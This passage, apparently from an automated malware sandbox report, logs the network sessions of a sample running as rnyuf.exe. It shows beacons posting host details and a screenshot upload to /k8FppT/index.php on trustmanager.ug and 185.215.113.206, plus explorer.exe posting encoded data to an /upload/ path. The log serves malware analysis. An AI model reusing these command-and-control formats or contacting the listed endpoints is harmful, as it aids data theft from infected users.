PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.3	49787	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:02.219069958 CEST	15933	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:02.219109058 CEST	15933	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:02.219230890 CEST	15943	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:02.219335079 CEST	15945	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:02.280324936 CEST	15952	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:02.280540943 CEST	15954	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:02.280695915 CEST	15957	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:02.281172991 CEST	15960	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:02.281224012 CEST	15962	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:02.281483889 CEST	15965	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:02.281512976 CEST	15967	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:02.505309105 CEST	16031	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.3	49785	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:02.265095949 CEST	15946	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 133 Host: atvcampingtrips.com
Aug 23, 2021 02:09:02.265110970 CEST	15946	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 7a 29 bd eb Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuz)&k>3r8hX[l}{!
Aug 23, 2021 02:09:07.296391964 CEST	16674	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:02 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.3	49788	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:02.353874922 CEST	16021	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:02.380392075 CEST	16022	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:02.380425930 CEST	16022	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.3	49789	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:02.522109032 CEST	16031	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:02.547995090 CEST	16033	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:02.548027039 CEST	16033	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.3	49790	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:02.716130018 CEST	16033	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:02.742093086 CEST	16035	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 